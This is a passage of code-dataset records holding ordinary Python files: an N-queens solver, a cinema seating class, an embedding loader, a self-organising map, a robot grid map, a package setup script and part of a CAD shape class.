re.S)\n\nwith open('proxy', 'w') as f:\n\tfor ip, port in proxys:\n\t\tf.write(ip+':'+port+'@\\n')\n","sub_path":"2017-3/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"493922412","text":"import time\nvisit_state = 0\n\ndef FCcheck(index,value,cur_un_assigned,cur_domain):\n\n for x in cur_un_assigned:\n new_domain = []\n for y in cur_domain[x]:\n if y == value or (abs(x - index) == abs(y - value)):\n continue\n else:\n new_domain.append(y)\n if len(new_domain) == 0:\n return \"DWO\"\n cur_domain[x] = new_domain\n return True\n\ndef FC(un_assigned,domain,solution,N,index):\n global visit_state\n visit_state += 1\n cur_un_assigned = un_assigned[:]\n cur_un_assigned.remove(index)\n for value in domain[index]:\n solution[index] = value\n if len(cur_un_assigned) <= 0:\n return True\n cur_domain = []\n for k in range(N):\n tmp = domain[k][:]\n cur_domain.append(tmp)\n if FCcheck(index,value,cur_un_assigned,cur_domain) == \"DWO\":\n continue\n min_index = cur_un_assigned[0] #存储当前取值最少的变量序号\n min_length = 
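# --- Aside: the core bookkeeping in zencad's `unit` class above is that a
# --- child's global placement is parent.global_location * self.location,
# --- refreshed down the tree. A minimal sketch of the same idea with 2-D
# --- translations standing in for pyservoce transforms (names are mine):
class Node:
    def __init__(self, parent=None, local=(0.0, 0.0)):
        self.parent, self.local, self.children = parent, local, []
        if parent:
            parent.children.append(self)
        self.location_update()

    def location_update(self):
        px, py = self.parent.global_loc if self.parent else (0.0, 0.0)
        self.global_loc = (px + self.local[0], py + self.local[1])
        for child in self.children:             # propagate to descendants
            child.location_update()

base = Node(local=(1.0, 0.0))
arm = Node(parent=base, local=(0.0, 2.0))
base.local = (5.0, 0.0); base.location_update()
print(arm.global_loc)                           # (5.0, 2.0): child follows parent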
len(cur_domain[min_index]) #存储当前取值最少的个数\n #遍历,寻找取值最少的变量序号\n for k in range(1,len(cur_un_assigned)):\n #如果取值更少,则直接更新值域长度、变量序号\n if len(cur_domain[cur_un_assigned[k]]) < min_length:\n min_length = len(cur_domain[cur_un_assigned[k]])\n min_index = cur_un_assigned[k]\n #将取值最少的变量序号作为参数传递\n result = FC(cur_un_assigned,cur_domain,solution,N,min_index)\n if result != False:\n return result\n\n return False\n\n\ndef start_FC(N):\n\n domain = []\n for i in range(N):\n domain.append([x for x in range(N)])\n\n un_assigned = [x for x in range(N)]\n solution = [0]*N\n\n result = FC(un_assigned,domain,solution,N,0)\n\n if result == True:\n return solution\n return False\n\ndef main():\n N = int(input('Please input N = '))\n start = time.clock()\n solution = start_FC(N)\n\n if solution == False:\n print(\"No solution\")\n else:\n for i in range(N):\n print('(', i, \",\", solution[i], ')', end='')\n print()\n\n end = time.clock()\n print(\"Forwardchecking run time : \",float(end - start),' s')\n print(\"visited state number: \",visit_state)\n\n queen_map = []\n for i in range(N):\n tmp = ['.'] * N\n queen_map.append(tmp)\n for i in range(len(solution)):\n queen_map[i][solution[i]] = 'X'\n\n for i in range(N):\n print(' ', ''.join(queen_map[i]))\n\n\nif __name__ == '__main__':\n main()","sub_path":"FC_optimization_MRV.py","file_name":"FC_optimization_MRV.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"404504278","text":"class CinemaHall:\n \"\"\" Кинозал \"\"\"\n def __init__(self, name, movie, rows=10, colomns=10):\n self.rows = rows\n self.colomns = colomns\n self.chairs = [[None for _ in range(colomns)] for _ in range(rows)]\n\n # имя заля\n self.name = name\n # кино, там показываемое\n self.movie = movie\n\n def __len__(self):\n return self.rows * self.colomns\n\n def __str__(self):\n res = \"\"\n res += f\"Кинозал '{self.name.capitalize()}'\" \\\n f\"\\nСейчас в прокате: {self.movie}\" \\\n f\"\\nВсего мест: {len(self)}\" \\\n f\"\\nЗанято: {self.count_taken()}\" \\\n f\"\\nМаксимально свободных мест рядом: {self.max_free_slice()}\\n\"\n\n for i in enumerate(self.chairs, 1):\n res += f\"{i[0]} ряд: \" + ' '.join('[0]' if j is None else '[P]' for j in i[1]) + '\\n'\n\n return res\n\n def is_correct(self, row=None, colomns=None):\n \"\"\" Должны быть переданы уже декриминированные значения переменных \"\"\"\n if row is not None:\n return not self.rows <= row <= 0\n if colomns is not None:\n return not self.colomns <= colomns <= 0\n raise ValueError(f\"Wrong input!\")\n\n def is_free(self, row_index, place_index):\n \"\"\" Свободно ли место\"\"\"\n if self.is_correct(row=row_index) and self.is_correct(colomns=place_index):\n return self.chairs[row_index][place_index] is None\n raise ValueError(\"Wrong numbers!\")\n\n def place(self, row, place):\n \"\"\"\" Поместить человека на место \"\"\"\n if not self.is_free(row, place):\n raise Exception(\"This place is occupied yet!\")\n self.chairs[row][place] = 1\n\n def count_taken(self):\n \"\"\" Возвращает количество занятых мест \"\"\"\n res = 0\n for i in self.chairs:\n res += len(list(filter(lambda x: x is not None, i)))\n return res\n\n def max_free_slice(self):\n \"\"\" Максимальное количество свободных мест рядом \"\"\"\n maxx = 0\n for i in self.chairs:\n tmp = 0\n for j in i:\n if j is None:\n tmp += 1\n else:\n if tmp > maxx:\n maxx = tmp\n tmp = 0\n if tmp > maxx:\n maxx = tmp\n return maxx\n\n def get_movie(self):\n return self.movie\n\n def 
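# --- Aside: what FCcheck above does in isolation: after fixing one queen,
# --- drop every conflicting value (same column or same diagonal) from the
# --- remaining variables' domains; MRV then branches on the tightest variable.
# --- A hand-checkable N=4 example:
def prune(col, val, domains):
    return {c: [v for v in vals if v != val and abs(c - col) != abs(v - val)]
            for c, vals in domains.items()}

domains = {c: list(range(4)) for c in range(1, 4)}
print(prune(0, 1, domains))   # {1: [3], 2: [0, 2], 3: [0, 2, 3]}
# Variable 1 shrank to a single value, so MRV would assign it next.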
__hash__(self):\n return hash(self.movie + self.name + f'{len(self)}')\n\n\nclass Cinema:\n def __init__(self, name, holles):\n self.name = name\n self.holles = holles\n\n def search_for_movie(self, ff):\n res = []\n print(*self.holles[0])\n for i in self.holles:\n if i.get_movie() == ff:\n print(i)\n #where = list(filter(lambda x: x.movie == ff, self.holles))\n #print(*where)\n\n\n\n\nif __name__== \"__main__\":\n a = CinemaHall(\"XxxXX\", \"Шляпа какая-то, режиссёр Ясос Биб\", 10, 10)\n\n b = Cinema(\"Convremennic\", [CinemaHall])\n print(b.search_for_movie(\"Шляпа какая-то, режиссёр Ясос Биб\"))\n try:\n for i in range(10):\n a.place(i, 1)\n for i in range(10):\n a.place(i, 1)\n except Exception as exp:\n print(exp)\n print(a)\n","sub_path":"Первое полугодие/Lesson 3 (Повторение. Проектирование классов)/Classwork/3. Кинотеатры.py","file_name":"3. Кинотеатры.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"302727396","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport json\n\n\ndef load_song_embedding(filename):\n\n row_idx = 0\n song_embedding = [[0 for _ in range(137)]]\n song_idx = {0: 0}\n tag_idx = {0: 0}\n lan_idx = {0: 0}\n cn_tag_idx = {0: 0}\n\n with open(filename, 'r') as fid:\n while True:\n row_idx += 1\n line = fid.readline()\n\n if line.strip() == \"\":\n break\n\n sid, info, tag, lan, cn_tag = line.split(\"\\t\")\n info = info.split(\",\")\n\n tag = int(tag)\n lan = int(lan)\n cn_tag = int(cn_tag)\n embedding = list(map(float, info))\n\n song_embedding.append(embedding)\n\n if sid not in song_idx:\n song_idx[sid] = row_idx\n\n if sid not in tag_idx:\n tag_idx[sid] = tag\n\n if sid not in lan_idx:\n lan_idx[sid] = lan\n\n if sid not in cn_tag_idx:\n cn_tag_idx[sid] = cn_tag\n\n song_embedding = np.array(song_embedding)\n print(song_embedding.shape)\n json.dump(song_idx, open(\"../data/song_idx.json\", 'w+'))\n json.dump(tag_idx, open(\"../data/tag_idx.json\", \"w+\"))\n json.dump(lan_idx, open(\"../data/lan_idx.json\", \"w+\"))\n json.dump(cn_tag_idx, open(\"../data/cn_tag_idx.json\", \"w+\"))\n\n np.save(\"../data/song\", song_embedding)\n\n\nif __name__ == \"__main__\":\n load_song_embedding(\"../data/song.embedding\")\n","sub_path":"netease_workCode/mlServer/music_din/src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"32883165","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport random\nfrom dataset import dataset\n\ndef distance(v1, v2):\n \"\"\"\n ベクトル距離計算\n \"\"\"\n dist = 0\n for i in range(len(v1)):\n dist += (v1[i]-v2[i])**2\n return dist**0.5\n\ndef distance_with_np(v1, v2):\n \"\"\"\n ベクトル距離計算\n \"\"\"\n dist = sum((v1-v2)**2)\n return dist**0.5\n\ndef near(map_vector, input_vector):\n \"\"\"\n 近傍点探索\n \"\"\"\n dist_vector = [distance_with_np(input_vector, m) for m in map_vector]\n return dist_vector.index(min(dist_vector))\n\ndef nearest_shape(vec, ans_vec):\n \"\"\"\n ans_vecの中から、vecに最も近いベクトルを探索する。\n \"\"\"\n dist_vector = [distance_with_np(vec, m) for m in ans_vec]\n return dist_vector.index(min(dist_vector))\n\nclass Som():\n \"\"\"\n vec_size : 入力ベクトルサイズ\n ans_vec : 答えとなるベクトル\n width : マップの横サイズ\n height : マップの縦サイズ\n iter : イテレーション回数\n learning_rate : 学習率\n \"\"\"\n\n def __init__(self,vec_size,ans_vec,width=20,height=20,iter=50,learning_rate=0.5,area_size=3):\n self.vec_size = vec_size\n 
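# --- Aside: max_free_slice above is a run-length scan: count consecutive None
# --- seats, remembering the best run (including one that reaches the end of a
# --- row). The same scan as a small checked function:
def longest_free_run(row):
    best = cur = 0
    for seat in row:
        cur = cur + 1 if seat is None else 0
        best = max(best, cur)
    return best

assert longest_free_run([None, 1, None, None, None, 1, None]) == 3
# (Note: the demo above constructs Cinema with the CinemaHall *class* in its
# hall list; search_for_movie only makes sense over CinemaHall instances.)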
self.width = width\n self.height = height\n self.map_vector = [np.array([random.random() for _ in range(vec_size)]) for _ in range(height) for _ in range(width)]\n self.iter = iter\n self.learning_rate = learning_rate\n self.area_size = area_size\n self.ans_vec = ans_vec\n\n def fit(self,X):\n a = 1.0\n a_size = self.area_size\n for iter in range(self.iter):\n for vec in X:\n bmu = near(self.map_vector, vec)\n\n for i in range(self.width * self.height):\n c = (a_size - distance([i // self.width, i % self.width], [bmu //self.width, bmu%self.width]))\n if c > 0:\n self.map_vector[i] = [mv+c*a*(iv-mv) for iv, mv in zip(vec, self.map_vector[i])]\n\n a = (self.iter - iter) / self.iter\n a_size = self.area_size * (self.iter - iter) / self.iter\n return self\n\n def _make_map(self):\n nearest_map = []\n for vec in self.map_vector:\n nearest_map.append(nearest_shape(vec, self.ans_vec))\n return nearest_map\n\n def show(self):\n som_map = self._make_map()\n for h in range(self.height):\n for w in range(self.width):\n print(som_map[h*self.height+w], end=' ')\n print()\n\n\n\nif __name__ == \"__main__\":\n data, label, ans_vec = dataset()\n som = Som(vec_size=784, ans_vec=ans_vec)\n som.fit(data)\n som.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"5472389","text":"import sys\nimport Box2D\nsys.path.append(\"..\")\nimport random\nfrom Referee.ICRAMap import BORDER_POS, BORDER_BOX\nfrom Objects.Robot import ROBOT_SIZE,SIZE\n\nBORDER_POS = [(-0.1, 2.5), (4, -0.1), (4, 5.1), (8.1, 2.5), (1.525, 1.9), (3.375, 0.5), (6.475, 3.1), (4.625, 4.5),\n (1.7, 3.875), (4, 2.5), (6.3, 1.125)]\nBORDER_BOX = [(0.1, 2.5), (4, 0.1), (4, 0.1), (0.1, 2.5), (0.125, 0.5), (0.125, 0.5), (0.125, 0.5), (0.125, 0.5),\n (0.5, 0.125), (0.5, 0.125), (0.5, 0.125)] # Half of the weight and height\n\nMAXSCALE = 20\n\nBIAS = 0.5\nBODYSIZE = SIZE*ROBOT_SIZE*1.4\n\nclass Cell(object):\n\n def __init__(self, char):\n self.char = char\n self.tag = 0\n self.index = 0\n self.neighbors = None\n\n\nclass Grid(object):\n\n def __init__(self, cells):\n self.height, self.width = len(cells), len(cells[0])\n self.cells = cells\n\n def __contains__(self, pos):\n y, x = pos\n return 0 <= y < self.height and 0 <= x < self.width\n\n def __getitem__(self, pos):\n y, x = pos\n return self.cells[y][x]\n\n def neighbors(self, y, x):\n for dy, dx in ((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1),\n (1, 0), (1, 1)):\n if (y + dy, x + dx) in self:\n yield y + dy, x + dx\n\n\ndef map2grid(width, height):\n str = ''\n\n for i in range(height):\n str += '\\n'\n for j in range(width):\n str += ' '\n\n for k in range(BORDER_POS.__len__()):\n hidx = (int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][1] - MAXSCALE * BORDER_BOX[k][1] - MAXSCALE * BODYSIZE),\n int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][1] + MAXSCALE * BORDER_BOX[k][1] + MAXSCALE * BODYSIZE))\n widx = (int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][0] - MAXSCALE * BORDER_BOX[k][0] - MAXSCALE * BODYSIZE),\n int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][0] + MAXSCALE * BORDER_BOX[k][0] + MAXSCALE * BODYSIZE))\n for i in range(hidx[0], hidx[1]):\n for j in range(max(widx[0], 1), widx[1]):\n mylen = i * (width + 1) + j\n str = str[:mylen] + '#' + str[mylen + 1:]\n\n return str\n\n\ndef parse_grid(grid_str, width, height):\n # Split the grid string into lines.\n lines = [line.rstrip() for line in grid_str.splitlines()[1:]]\n\n # Pad the top and 
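# --- Aside: one neighborhood update from Som.fit above, worked by hand. Each
# --- map vector moves a fraction c*a of the way toward the input:
# --- map[i] = m + c*a*(x - m). Illustrative numbers:
m, x = [0.2, 0.8], [1.0, 0.0]
a, c = 0.5, 1.0
print([mv + c * a * (xv - mv) for xv, mv in zip(x, m)])   # [0.6, 0.4]
# (Note: show() above indexes with h*self.height+w, which is only correct
# while the map stays square, i.e. width == height.)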
bottom.\n top = 0#(height - len(lines)) // 2\n bottom =height #(height - len(lines) + 1) // 2\n lines = ([''] * top + lines + [''] * bottom)[:height]\n\n # Pad the left and right sides.\n max_len = max(len(line) for line in lines)\n left = 0#(width - max_len) // 2\n lines = [' ' * left + line.ljust(width - left)[:width - left]\n for line in lines]\n\n # Create the grid.\n cells = [[Cell(char) for char in line] for line in lines]\n return Grid(cells)\n\ndef view_grid(grid):\n # Update the grid view.\n str = ''\n for y, line in enumerate(grid.cells):\n for x, cell in enumerate(line):\n char = cell.char\n if (char == '#'):\n str += '#'\n else:\n str += ' '\n str += '\\n'\n return str\n\n\ndef view_path(str, path, width):\n for i in range(path.__len__()):\n mylen = path[i][0] * (width + 1) + path[i][1] + 1\n str = str[:mylen] + ':' + str[mylen + 1:]\n\n return str\n\nBIASX = 3\nBIASY = 0\ndef grid2world(path):\n cood = Box2D.b2Vec2((float(path[1] + BIASX)) / MAXSCALE - BIAS,\n (float(path[0]) + BIASY) / MAXSCALE - BIAS)\n return cood\n\n\ndef world2grid(cood):\n path = (int(MAXSCALE * BIAS + MAXSCALE * cood.y) - BIASY,\n int(MAXSCALE * BIAS + MAXSCALE * cood.x) - BIASX)\n\n return path\n\n\nif __name__ == '__main__':\n import random\n\n width = 500\n height = 116\n str = map2grid(width, height)\n print(str)\n mylen = str.__len__()\n grid = parse_grid(str, width, height)\n str=view_grid(grid)\n print(str)\n","sub_path":"util/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"463258521","text":"import os\nimport io\nfrom setuptools import setup, find_packages\nfrom subprocess import check_output\nfrom setuptools.dist import Distribution\nfrom platform import system\n\ndata_files = []\nfor path, dirnames, filenames in os.walk('python'):\n for filename in filenames:\n data_files.append(os.path.join(path, filename))\n\n# Use libpath.py to locate libdlr.so\nLIBPATH_PY = os.path.abspath('./dlr/libpath.py')\nLIBPATH = {'__file__': LIBPATH_PY}\nexec(compile(open(LIBPATH_PY, \"rb\").read(), LIBPATH_PY, 'exec'),\n LIBPATH, LIBPATH)\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))\nLIB_PATH = [os.path.relpath(LIBPATH['find_lib_path'](setup=True), CURRENT_DIR)]\n\nif not LIB_PATH:\n raise RuntimeError('libdlr.so missing. 
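# --- Aside: the grid<->world mapping from Grid.py above, restated without
# --- Box2D and round-tripped once, using the module constants as defined
# --- (MAXSCALE=20, BIAS=0.5, BIASX=3, BIASY=0). int() truncates, so the round
# --- trip is only exact when the products land on whole numbers, as here:
def grid_to_world(cell):
    return ((cell[1] + 3) / 20 - 0.5, (cell[0] + 0) / 20 - 0.5)   # (x, y)

def world_to_grid(x, y):
    return (int(20 * 0.5 + 20 * y) - 0, int(20 * 0.5 + 20 * x) - 3)

assert world_to_grid(*grid_to_world((10, 2))) == (10, 2)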
Please compile first using CMake')\n\n# fetch meta data\nMETADATA_PY = os.path.abspath(\"./dlr/metadata.py\")\nMETADATA_PATH = {\"__file__\": METADATA_PY}\nMETADATA_BIN = open(METADATA_PY, \"rb\")\nexec(compile(METADATA_BIN.read(), METADATA_PY, 'exec'), METADATA_PATH, METADATA_PATH)\nMETADATA_BIN.close()\n\nsetup(\n name=\"dlr\",\n version=METADATA_PATH['VERSION'],\n\n zip_safe=False,\n install_requires=['numpy', 'requests', \"distro\"],\n\n # declare your packages\n packages=find_packages(),\n\n # include data files\n include_package_data=True,\n data_files=[('dlr', LIB_PATH)],\n\n description = 'Common runtime for machine learning models compiled by \\\n AWS SageMaker Neo, TVM, or TreeLite.',\n long_description=io.open(os.path.join(CURRENT_DIR, '../README.md'), encoding='utf-8').read(),\n long_description_content_type=\"text/markdown\",\n author = 'AWS Neo',\n author_email = 'aws-neo-ai@amazon.com',\n url='https://github.com/neo-ai/neo-ai-dlr',\n license = \"Apache-2.0\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: Apache Software License\",\n ],\n)\n","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"115377144","text":"\nimport json\nimport numbers\nimport warnings\nfrom collections.abc import Iterable\nfrom pathlib import Path\nfrom typing import List, Tuple, Optional, Union\n\nimport cadquery as cq\nimport matplotlib.pyplot as plt\nfrom cadquery import exporters\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Polygon\n\nimport paramak\nfrom paramak.neutronics_utils import (add_stl_to_moab_core,\n define_moab_core_and_tags)\nfrom paramak.utils import (_replace, cut_solid, facet_wire, get_hash,\n intersect_solid, plotly_trace, union_solid)\n\n\nclass Shape:\n \"\"\"A shape object that represents a 3d volume and can have materials and\n neutronics tallies assigned. Shape objects are not intended to be used\n directly by the user but provide basic functionality for user-facing\n classes that inherit from Shape.\n\n Args:\n points (list of (float, float, float), optional): the x, y, z\n coordinates of points that make up the shape. Defaults to None.\n connection_type (str, optional): The type of connection between points.\n Possible values are \"straight\", \"circle\", \"spline\", \"mixed\".\n Defaults to \"mixed\".\n name (str, optional): the name of the shape, used in the graph legend\n by export_html. Defaults to None.\n color ((float, float, float [, float]), optional): The color to use\n when exporting as html graphs or png images. Can be in RGB or RGBA\n format with floats between 0 and 1. Defaults to (0.5, 0.5, 0.5).\n material_tag (str, optional): the material name to use when exporting\n the neutronics description. Defaults to None.\n stp_filename (str, optional): the filename used when saving stp files.\n Defaults to None.\n stl_filename (str, optional): the filename used when saving stl files.\n Defaults to None.\n azimuth_placement_angle (iterable of floats or float, optional): the\n azimuth angle(s) used when positioning the shape. If a list of\n angles is provided, the shape is duplicated at all angles.\n Defaults to 0.0.\n workplane (str, optional): the orientation of the Cadquery workplane.\n (XY, YZ or XZ). 
Defaults to \"XZ\".\n rotation_axis (str or list, optional): rotation axis around which the\n solid is rotated. If None, the rotation axis will depend on the\n workplane or path_workplane if applicable. Can be set to \"X\", \"-Y\",\n \"Z\", etc. A custom axis can be set by setting a list of two XYZ\n floats. Defaults to None.\n tet_mesh (str, optional): If not None, a tet mesh flag will be added to\n the neutronics description output. Defaults to None.\n surface_reflectivity (Boolean, optional): If True, a\n surface_reflectivity flag will be added to the neutronics\n description output. Defaults to None.\n physical_groups (dict, optional): contains information on physical\n groups (volumes and surfaces). Defaults to None.\n cut (paramak.shape or list, optional): If set, the current solid will\n be cut with the provided solid or iterable in cut. Defaults to\n None.\n intersect (paramak.shape or list, optional): If set, the current solid\n will be interested with the provided solid or iterable of solids.\n Defaults to None.\n union (paramak.shape or list, optional): If set, the current solid\n will be united with the provided solid or iterable of solids.\n Defaults to None.\n \"\"\"\n\n def __init__(\n self,\n points: list = None,\n connection_type: Optional[str] = \"mixed\",\n name: Optional[str] = None,\n color: Optional[Tuple[float, float, float]] = (0.5, 0.5, 0.5),\n material_tag: Optional[str] = None,\n stp_filename: Optional[str] = None,\n stl_filename: Optional[str] = None,\n azimuth_placement_angle: Optional[Union[float, List[float]]] = 0.0,\n workplane: Optional[str] = \"XZ\",\n rotation_axis: Optional[str] = None,\n tet_mesh: Optional[str] = None,\n surface_reflectivity: Optional[bool] = False,\n physical_groups=None,\n # TODO defining Shape types as paramak.Shape results in circular import\n cut=None,\n intersect=None,\n union=None,\n ):\n\n self.connection_type = connection_type\n self.points = points\n self.stp_filename = stp_filename\n self.stl_filename = stl_filename\n self.color = color\n self.name = name\n\n self.cut = cut\n self.intersect = intersect\n self.union = union\n\n self.azimuth_placement_angle = azimuth_placement_angle\n self.workplane = workplane\n self.rotation_axis = rotation_axis\n\n # neutronics specific properties\n self.material_tag = material_tag\n self.tet_mesh = tet_mesh\n self.surface_reflectivity = surface_reflectivity\n\n self.physical_groups = physical_groups\n\n # properties calculated internally by the class\n self.solid = None\n self.wire = None\n self.render_mesh = None\n # self.volume = None\n self.hash_value = None\n self.points_hash_value = None\n self.x_min = None\n self.x_max = None\n self.z_min = None\n self.z_max = None\n self.graveyard_offset = None # set by the make_graveyard method\n self.patch = None\n\n @property\n def solid(self):\n \"\"\"The CadQuery solid of the 3d object. Returns a CadQuery workplane\n or CadQuery Compound\"\"\"\n\n ignored_keys = [\"_solid\", \"_hash_value\"]\n if get_hash(self, ignored_keys) != self.hash_value:\n self.create_solid()\n self.hash_value = get_hash(self, ignored_keys)\n\n return self._solid\n\n @solid.setter\n def solid(self, value):\n self._solid = value\n\n @property\n def wire(self):\n \"\"\"The CadQuery wire of the 3d object. 
Returns a CadQuery workplane\n or CadQuery Compound\"\"\"\n\n ignored_keys = [\"_wire\", \"_solid\", \"_hash_value\"]\n if get_hash(self, ignored_keys) != self.hash_value:\n self.create_solid()\n self.hash_value = get_hash(self, ignored_keys)\n\n return self._wire\n\n @wire.setter\n def wire(self, value):\n self._wire = value\n\n @property\n def cut(self):\n return self._cut\n\n @cut.setter\n def cut(self, value):\n self._cut = value\n\n @property\n def intersect(self):\n return self._intersect\n\n @intersect.setter\n def intersect(self, value):\n self._intersect = value\n\n @property\n def union(self):\n return self._union\n\n @union.setter\n def union(self, value):\n self._union = value\n\n @property\n def largest_dimension(self):\n \"\"\"Calculates a bounding box for the Shape and returns the largest\n absolute value of the largest dimension of the bounding box\"\"\"\n largest_dimension = 0\n if isinstance(self.solid, (cq.Compound, cq.occ_impl.shapes.Solid)):\n for solid in self.solid.Solids():\n largest_dimension = max(\n abs(self.solid.BoundingBox().xmax),\n abs(self.solid.BoundingBox().xmin),\n abs(self.solid.BoundingBox().ymax),\n abs(self.solid.BoundingBox().ymin),\n abs(self.solid.BoundingBox().zmax),\n abs(self.solid.BoundingBox().zmin),\n largest_dimension\n )\n else:\n largest_dimension = max(\n abs(self.solid.val().BoundingBox().xmax),\n abs(self.solid.val().BoundingBox().xmin),\n abs(self.solid.val().BoundingBox().ymax),\n abs(self.solid.val().BoundingBox().ymin),\n abs(self.solid.val().BoundingBox().zmax),\n abs(self.solid.val().BoundingBox().zmin),\n largest_dimension\n )\n self.largest_dimension = largest_dimension\n return largest_dimension\n\n @largest_dimension.setter\n def largest_dimension(self, value):\n self._largest_dimension = value\n\n @property\n def workplane(self):\n return self._workplane\n\n @workplane.setter\n def workplane(self, value):\n acceptable_values = [\"XY\", \"YZ\", \"XZ\", \"YX\", \"ZY\", \"ZX\"]\n if value in acceptable_values:\n self._workplane = value\n else:\n raise ValueError(\n \"Shape.workplane must be one of \",\n acceptable_values,\n \" not \",\n value)\n\n @property\n def rotation_axis(self):\n return self._rotation_axis\n\n @rotation_axis.setter\n def rotation_axis(self, value):\n if isinstance(value, str):\n acceptable_values = \\\n [\"X\", \"Y\", \"Z\", \"-X\", \"-Y\", \"-Z\", \"+X\", \"+Y\", \"+Z\"]\n if value not in acceptable_values:\n msg = \"Shape.rotation_axis must be one of \" + \\\n \" \".join(acceptable_values) + \\\n \" not \" + value\n raise ValueError(msg)\n elif isinstance(value, Iterable):\n msg = \"Shape.rotation_axis must be a list of two (X, Y, Z) floats\"\n if len(value) != 2:\n raise ValueError(msg)\n for point in value:\n if not isinstance(point, tuple):\n raise ValueError(msg)\n if len(point) != 3:\n raise ValueError(msg)\n for val in point:\n if not isinstance(val, (int, float)):\n raise ValueError(msg)\n\n if value[0] == value[1]:\n msg = \"The two points must be different\"\n raise ValueError(msg)\n elif value is not None:\n msg = \"Shape.rotation_axis must be a list or a string or None\"\n raise ValueError(msg)\n self._rotation_axis = value\n\n @property\n def volume(self):\n \"\"\"Get the total volume of the Shape. Returns a float\"\"\"\n if isinstance(self.solid, cq.Compound):\n return self.solid.Volume()\n\n return self.solid.val().Volume()\n\n @property\n def volumes(self):\n \"\"\"Get the volumes of the Shape. Compound shapes provide a seperate\n volume value for each entry. 
Returns a list of floats\"\"\"\n all_volumes = []\n if isinstance(self.solid, cq.Compound):\n for solid in self.solid.Solids():\n all_volumes.append(solid.Volume())\n return all_volumes\n\n return [self.solid.val().Volume()]\n\n @property\n def area(self):\n \"\"\"Get the total surface area of the Shape. Returns a float\"\"\"\n if isinstance(self.solid, cq.Compound):\n return self.solid.Area()\n\n return self.solid.val().Area()\n\n @property\n def areas(self):\n \"\"\"Get the surface areas of the Shape. Compound shapes provide a\n seperate area value for each entry. Returns a list of floats\"\"\"\n all_areas = []\n if isinstance(self.solid, cq.Compound):\n for face in self.solid.Faces():\n all_areas.append(face.Area())\n return all_areas\n\n for face in self.solid.val().Faces():\n all_areas.append(face.Area())\n return all_areas\n\n @property\n def hash_value(self):\n return self._hash_value\n\n @hash_value.setter\n def hash_value(self, value):\n self._hash_value = value\n\n @property\n def points_hash_value(self):\n return self._points_hash_value\n\n @points_hash_value.setter\n def points_hash_value(self, value):\n self._points_hash_value = value\n\n @property\n def color(self):\n return self._color\n\n @color.setter\n def color(self, value):\n error = False\n if isinstance(value, (list, tuple)):\n if len(value) in [3, 4]:\n for i in value:\n if not isinstance(i, (int, float)):\n error = True\n else:\n error = True\n else:\n error = True\n # raise error\n if error:\n raise ValueError(\n \"Shape.color must be a list or tuple of 3 or 4 floats\")\n self._color = value\n\n @property\n def material_tag(self):\n \"\"\"The material_tag assigned to the Shape. Used when taging materials\n for use in neutronics descriptions\"\"\"\n\n return self._material_tag\n\n @material_tag.setter\n def material_tag(self, value):\n if value is None:\n self._material_tag = value\n elif isinstance(value, str):\n if len(value) > 27:\n msg = \"Shape.material_tag > 28 characters.\" + \\\n \"Use with DAGMC will be affected.\" + str(value)\n warnings.warn(msg)\n self._material_tag = value\n else:\n raise ValueError(\"Shape.material_tag must be a string\", value)\n\n @property\n def tet_mesh(self):\n return self._tet_mesh\n\n @tet_mesh.setter\n def tet_mesh(self, value):\n if value is not None and not isinstance(value, str):\n raise ValueError(\"Shape.tet_mesh must be a string\", value)\n self._tet_mesh = value\n\n @property\n def name(self):\n \"\"\"The name of the Shape, used to identify Shapes when exporting_html\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, value):\n if value is not None and not isinstance(value, str):\n raise ValueError(\"Shape.name must be a string\", value)\n self._name = value\n\n @property\n def points(self):\n \"\"\"Sets the Shape.point attributes.\n\n Args:\n points (a list of lists or tuples): list of points that create the\n shape\n\n Raises:\n incorrect type: only list of lists or tuples are accepted\n \"\"\"\n ignored_keys = [\"_points\", \"_points_hash_value\"]\n if hasattr(self, 'find_points') and \\\n self.points_hash_value != get_hash(self, ignored_keys):\n self.find_points()\n self.points_hash_value = get_hash(self, ignored_keys)\n\n return self._points\n\n @points.setter\n def points(self, values):\n\n if values is not None:\n if not isinstance(values, list):\n raise ValueError(\"points must be a list\")\n\n if self.connection_type != \"mixed\":\n values = [(*p, self.connection_type) for p in values]\n\n for value in values:\n if type(value) not in [list, tuple]:\n 
